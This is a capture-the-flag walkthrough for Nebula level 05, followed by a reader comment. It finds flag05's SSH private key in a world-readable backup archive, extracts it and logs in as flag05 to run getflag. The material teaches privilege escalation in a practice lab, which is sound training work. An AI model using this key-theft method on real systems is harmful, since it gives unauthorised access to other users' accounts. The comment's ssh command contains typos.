Check the flag05 home directory. You are looking for weak directory permissions
Let’s start looking in /home/flag05:
level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05 80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root root 420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05 13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05 60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
Compare to the home directory of level05:
level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05 100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root root 420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05 298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05 60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
So we have .ssh – the store of SSH keys for the user – and .backup. The .ssh directory is locked down so we can’t see it.
Let’s look in .backup:
level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05 80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
A single backup .tgz. Let’s copy it out to our own home directory and unpack.
level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
That’s the private (id_rsa) and public (id_rsa.pub) keys for flag05. They may well work on the local machine:
level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
Simple. That’s why you should keep your private key private!
marlon
September 13, 2018 at 5:07pmI had to use some other switches for this
ssh -I id_rsa flag05@hocalhost